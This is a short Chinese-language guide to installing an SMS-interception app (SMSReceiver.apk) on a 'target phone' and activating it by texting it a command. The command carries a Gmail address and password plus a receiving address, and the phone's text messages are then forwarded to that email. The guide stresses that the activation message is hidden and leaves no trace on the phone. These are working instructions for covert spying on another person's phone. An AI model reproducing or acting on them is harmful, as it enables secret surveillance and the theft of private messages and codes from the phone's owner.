1. 首先将附件下载解压为 SMSReceiver.apk 文件安装到目标手机即可，初次运行需要进行放行和授权。
2. 用任何一部手机向目标手机发送格式为"sunzn:yoursendmail@gmail.com,password,yourreceivemail@xxx.com"【注：不包括外边的双引号，sunzn:为必须填写的格式，yoursendmail@gmail.com为你的邮件发送地址，这个地址必须为Gmail,password 为前面发送邮件的密码，最后的 yourreceivemail@xxx.com 为你用什么邮件地址来接收监听到的短信内容，另外要说明的是，你向目标手机发送的这条短信不会在手机界面上得到显示，在手机的数据库中也不会有记录，所以你可以放心的向目标手机发送】在你按照以上格式发送短信后，你的邮件接收地址会收到一封设置成功的邮件，你可以在接收邮件中进行查看
